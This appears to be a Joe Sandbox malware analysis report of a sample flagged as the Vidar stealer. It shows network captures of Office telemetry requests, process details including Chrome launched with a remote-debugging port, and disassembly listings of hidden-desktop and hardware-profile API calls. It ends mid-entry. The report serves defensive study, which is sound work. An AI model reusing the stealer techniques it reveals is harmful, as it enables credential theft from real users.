                                                                                                                    2024-11-30 10:35:54 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    147192.168.2.44989713.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:54 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:54 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:54 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1403
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                    ETag: "0x8DC582BDC2EEE03"
                                                                                                                    x-ms-request-id: e18ed455-301e-0020-35fa-416299000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103554Z-174f78459685726chC1EWRsnbg00000011b0000000004v2f
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:54 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    148192.168.2.44989813.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:54 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:55 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:54 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1366
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                    ETag: "0x8DC582BEA414B16"
                                                                                                                    x-ms-request-id: 728012b0-501e-0047-1614-41ce6c000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103554Z-174f7845968psccphC1EWRuz9s00000011eg00000000a01d
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:55 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    149192.168.2.44989913.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:54 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:55 UTC494INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:55 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 1399
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                    ETag: "0x8DC582BE1CC18CD"
                                                                                                                    x-ms-request-id: 9f43eb8e-e01e-003c-5891-3fc70b000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103555Z-174f7845968n2hr8hC1EWR9cag00000010wg000000006zp4
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:55 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:05:33:59
                                                                                                                    Start date:30/11/2024
                                                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:1'916'928 bytes
                                                                                                                    MD5 hash:A151487B27E539F2F2EC79AC50940872
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2492376383.00000000004AE000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:2
                                                                                                                    Start time:05:34:18
                                                                                                                    Start date:30/11/2024
                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                    File size:3'242'272 bytes
                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:4
                                                                                                                    Start time:05:34:19
                                                                                                                    Start date:30/11/2024
                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2460 --field-trial-handle=2408,i,1632556289935480309,8221903715599976969,262144 /prefetch:8
                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                    File size:3'242'272 bytes
                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:9
                                                                                                                    Start time:05:34:50
                                                                                                                    Start date:30/11/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6976 -s 2348
                                                                                                                    Imagebase:0x410000
                                                                                                                    File size:483'680 bytes
                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:0.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:3.7%
                                                                                                                      Total number of Nodes:82
                                                                                                                      Total number of Limit Nodes:11
                                                                                                                      execution_graph 6581 4bd0cbe 6588 4bd0ce5 6581->6588 6583 4bd0c70 6584 4bd0ce5 CreateDesktopExA 6583->6584 6585 4bd0cd7 CreateDesktopExA 6583->6585 6584->6583 6587 4bd0dc7 6585->6587 6589 4bd0cff CreateDesktopExA 6588->6589 6591 4bd0dc7 6589->6591 6591->6583 6608 4bd0cf0 6609 4bd0cba 6608->6609 6610 4bd0ce5 CreateDesktopExA 6609->6610 6612 4bd0cd7 CreateDesktopExA 6609->6612 6611 4bd0c70 6610->6611 6611->6612 6613 4bd0ce5 CreateDesktopExA 6611->6613 6615 4bd0dc7 6612->6615 6613->6611 6616 4be04ef 6617 4be04f6 6616->6617 6624 4be05ba 6617->6624 6619 4be0698 GetCurrentHwProfileW 6620 4be05b6 6619->6620 6620->6619 6621 4be06bd GetCurrentHwProfileW 6620->6621 6623 4be087c 6621->6623 6626 4be05d3 6624->6626 6625 4be0698 GetCurrentHwProfileW 6625->6626 6626->6625 6627 4be06bd GetCurrentHwProfileW 6626->6627 6629 4be087c 6627->6629 6629->6620 6598 4be06a0 6599 4be0656 6598->6599 6599->6598 6601 4be06bd GetCurrentHwProfileW 6599->6601 6604 4be0698 6599->6604 6603 4be087c 6601->6603 6605 4be06a5 GetCurrentHwProfileW 6604->6605 6607 4be087c 6605->6607 6607->6599 6713 4bd0c62 6714 4bd0c70 6713->6714 6716 4bd0cd7 CreateDesktopExA 6713->6716 6715 4bd0ce5 CreateDesktopExA 6714->6715 6714->6716 6715->6714 6718 4bd0dc7 6716->6718 6679 4bd0c1c 6680 4bd0c07 6679->6680 6680->6679 6681 4bd0ce5 CreateDesktopExA 6680->6681 6682 4bd0cd7 6680->6682 6681->6680 6683 4bd0d9f CreateDesktopExA 6682->6683 6684 4bd0dc7 6683->6684 6813 4bd0d5e 6814 4bd0d61 CreateDesktopExA 6813->6814 6817 4bd0dd4 6813->6817 6816 4bd0dc7 6814->6816 6634 4be04db 6635 4be0502 6634->6635 6636 4be05ba 2 API calls 6635->6636 6638 4be05b6 6636->6638 6637 4be0698 GetCurrentHwProfileW 6637->6638 6638->6637 6639 4be06bd GetCurrentHwProfileW 6638->6639 6641 4be087c 6639->6641 6579 4bd0d9a CreateDesktopExA 6580 4bd0dc7 6579->6580 6642 4be06d1 6643 4be06da GetCurrentHwProfileW 6642->6643 6645 4be087c 6643->6645 6691 4bd0c0d 6692 4bd0c2c 6691->6692 6693 4bd0ce5 CreateDesktopExA 6692->6693 6694 4bd0cd7 CreateDesktopExA 6692->6694 6693->6692 6696 4bd0dc7 6694->6696 6697 4be060a 6699 4be060b 6697->6699 6698 4be0698 GetCurrentHwProfileW 6698->6699 6699->6698 6700 4be06bd GetCurrentHwProfileW 6699->6700 6702 4be087c 6700->6702 6797 4bd0d09 6798 4bd0d1b CreateDesktopExA 6797->6798 6800 4bd0dc7 6798->6800 6646 4be04c2 6649 4be04cb 6646->6649 6648 4be04c7 6650 4be04dd 6649->6650 6651 4be05ba 2 API calls 6650->6651 6653 4be05b6 6651->6653 6652 4be0698 GetCurrentHwProfileW 6652->6653 6653->6648 6653->6652 6654 4be06bd GetCurrentHwProfileW 6653->6654 6656 4be087c 6654->6656 6656->6648

                                                                                                                      Executed Functions

                                                                                                                      Function 04BD0CE5 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateDesktopExA.USER32(?,?,?,?,?,?,00000000,00000000), ref: 04BD0DAB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494364291.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDesktop
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3054513912-0
                                                                                                                      • Opcode ID: b2e5e8613b303ff25e27768cea938ae42e008f619670a0e88950c175a8de482d
                                                                                                                      • Instruction ID: a5891cccddbb4485aa67e4c4ae704a5c7edb6554ea1c56534ee68ae30e58b826
                                                                                                                      • Opcode Fuzzy Hash: b2e5e8613b303ff25e27768cea938ae42e008f619670a0e88950c175a8de482d
                                                                                                                      • Instruction Fuzzy Hash: 89F06DEB288114BD644265966B04AFAAA2FF2D7338B3084E7FD1394953B3D52A6D7031
                                                                                                                      Function 04BE06A0 Relevance: 1.7, APIs: 1, Instructions: 214COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04BE0867
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494378008.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4be0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProfile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2104809126-0
                                                                                                                      • Opcode ID: 1c0e7d23f7ff37a454122bb04cdf7bda5a924fd0d68f15c76a69c73ba96d74f4
                                                                                                                      • Instruction ID: e6b98f35bf4e5968c082163f6d106a4543624c8d06e13099f93b8ba33ca08f8c
                                                                                                                      • Opcode Fuzzy Hash: 1c0e7d23f7ff37a454122bb04cdf7bda5a924fd0d68f15c76a69c73ba96d74f4
                                                                                                                      • Instruction Fuzzy Hash: 814114EB20C135BDB242B5872B50BFA6B6DE6D673073080E6F507D6601F3D42A8A3571
                                                                                                                      Function 04BE0698 Relevance: 1.7, APIs: 1, Instructions: 174COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 46 4be0698-4be0849 66 4be0856-4be086c GetCurrentHwProfileW 46->66 68 4be087c-4be09ba call 4be09be 66->68
                                                                                                                      APIs
                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04BE0867
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494378008.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4be0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProfile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2104809126-0
                                                                                                                      • Opcode ID: 346f01cc261e0e0cad7267f4e3aa73b097a7d5a97531f149716c07eb8ed8be4f
                                                                                                                      • Instruction ID: 836dc8d8d1c73b5d38e2517f92b30506546bc701270a49715be992b83dd92b50
                                                                                                                      • Opcode Fuzzy Hash: 346f01cc261e0e0cad7267f4e3aa73b097a7d5a97531f149716c07eb8ed8be4f
                                                                                                                      • Instruction Fuzzy Hash: 9431B3EB30C135BDB142B5476B50AFA666DE7E6330B3080E6B607D5601F3D42E8A3571
                                                                                                                      Function 04BE06D1 Relevance: 1.7, APIs: 1, Instructions: 167COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 86 4be06d1-4be0849 103 4be0856-4be086c GetCurrentHwProfileW 86->103 105 4be087c-4be09ba call 4be09be 103->105
                                                                                                                      APIs
                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04BE0867
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494378008.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4be0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProfile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2104809126-0
                                                                                                                      • Opcode ID: e2cd41304de818bc3aa466636fe40733c7cf30d5433e526622aecea7fa052765
                                                                                                                      • Instruction ID: e88fe43743b1ad3f370c74154d7bc6dd3d463ecfa39f6d63f710430aecb3af8c
                                                                                                                      • Opcode Fuzzy Hash: e2cd41304de818bc3aa466636fe40733c7cf30d5433e526622aecea7fa052765
                                                                                                                      • Instruction Fuzzy Hash: D431D4EB30C138BDB142B5476B50AFA666DE7E6330B3080E6B607D5601F3D42E8A7571
                                                                                                                      Function 04BE06EF Relevance: 1.7, APIs: 1, Instructions: 158COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 123 4be06ef-4be0849 139 4be0856-4be086c GetCurrentHwProfileW 123->139 141 4be087c-4be09ba call 4be09be 139->141
                                                                                                                      APIs
                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04BE0867
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494378008.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4be0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProfile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2104809126-0
                                                                                                                      • Opcode ID: b58ec629601d39f9d61a9509e5688882f94c7faf0085f297d331dec6c84da2c0
                                                                                                                      • Instruction ID: dcc9809c074283fd1e67946b5e7e28e1597f6f2b7daa4c106398b59ec183ec31
                                                                                                                      • Opcode Fuzzy Hash: b58ec629601d39f9d61a9509e5688882f94c7faf0085f297d331dec6c84da2c0
                                                                                                                      • Instruction Fuzzy Hash: AF31B6EB30C135BDB142B5472B90AFA676DE6E673073080E6B60BD5601F3D42E8A7571
                                                                                                                      Function 04BE0720 Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 159 4be0720-4be072e 160 4be070f-4be071b 159->160 161 4be0730-4be0732 159->161 163 4be0734-4be0849 160->163 161->163 176 4be0856-4be086c GetCurrentHwProfileW 163->176 178 4be087c-4be09ba call 4be09be 176->178
                                                                                                                      APIs
                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04BE0867
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494378008.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4be0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProfile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2104809126-0
                                                                                                                      • Opcode ID: 4002d341cc765532dbd604b02668f27c2ee7260d8858d49f8b4c3e3588d76187
                                                                                                                      • Instruction ID: 69c16d1b5e279a9aebd72a946a4872b1f569dc7f154b432cda787d0056bc17aa
                                                                                                                      • Opcode Fuzzy Hash: 4002d341cc765532dbd604b02668f27c2ee7260d8858d49f8b4c3e3588d76187
                                                                                                                      • Instruction Fuzzy Hash: 903128EB30C135ADB252B95B5750AFA266DE7E633073080E6F207C6501F3D42E893561
                                                                                                                      Function 04BE070A Relevance: 1.6, APIs: 1, Instructions: 148COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 196 4be070a-4be0849 211 4be0856-4be086c GetCurrentHwProfileW 196->211 213 4be087c-4be09ba call 4be09be 211->213
                                                                                                                      APIs
                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04BE0867
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494378008.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4be0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProfile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2104809126-0
                                                                                                                      • Opcode ID: 4351ffea3efc0d1b38280fa795e26dcc3c78e331e0b14ee89823ccfd56228b9a
                                                                                                                      • Instruction ID: 19688a4afbfb6d48e85f3da7f7c50f62b1099de18e20fb54760445d00ff05d4b
                                                                                                                      • Opcode Fuzzy Hash: 4351ffea3efc0d1b38280fa795e26dcc3c78e331e0b14ee89823ccfd56228b9a
                                                                                                                      • Instruction Fuzzy Hash: 62310CEB30C135BDB242B54B5B50AFA666DE6E633073080E6B607D5601F3D42F8A3571
                                                                                                                      Function 04BD0C0D Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 231 4bd0c0d-4bd0c6e 236 4bd0c7e-4bd0ccb 231->236 240 4bd0cd3-4bd0cd5 236->240 241 4bd0cce call 4bd0ce5 236->241 242 4bd0cd7-4bd0d95 240->242 243 4bd0c70-4bd0c78 240->243 241->240 251 4bd0d9f-4bd0db0 CreateDesktopExA 242->251 243->236 252 4bd0dc7-4bd0dcc 251->252
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494364291.0000000004BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4bd0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDesktop
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3054513912-0
                                                                                                                      • Opcode ID: c3fd31171124c7ad2aa4b616936787635bc1333741944ce23f0d46abfc1bf1ac
                                                                                                                      • Instruction ID: 21d8697ffd25b291bb30a2948472a189803fa6adf0b9ec0cb16562eeb99da12f
                                                                                                                      • Opcode Fuzzy Hash: c3fd31171124c7ad2aa4b616936787635bc1333741944ce23f0d46abfc1bf1ac
                                                                                                                      • Instruction Fuzzy Hash: 4221E0AB28E244BDE2036A951B146F67E2EB783734B3440E2F8039A493F3D46A597171
                                                                                                                      Function 04BE0745 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 253 4be0745-4be0849 266 4be0856-4be086c GetCurrentHwProfileW 253->266 268 4be087c-4be09ba call 4be09be 266->268
                                                                                                                      APIs
                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04BE0867
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2494378008.0000000004BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04BE0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4be0000_file.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProfile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2104809126-0
                                                                                                                      • Opcode ID: e655fdd354aa6c49536b102cbf5fbe571565f81b49c22332867c632517da5c73
                                                                                                                      • Instruction ID: 1cd3f64db55cbc99c3d4b95fd83c787da0d5eb6ee786ca2770c45dd72df797d1
                                                                                                                      • Opcode Fuzzy Hash: e655fdd354aa6c49536b102cbf5fbe571565f81b49c22332867c632517da5c73
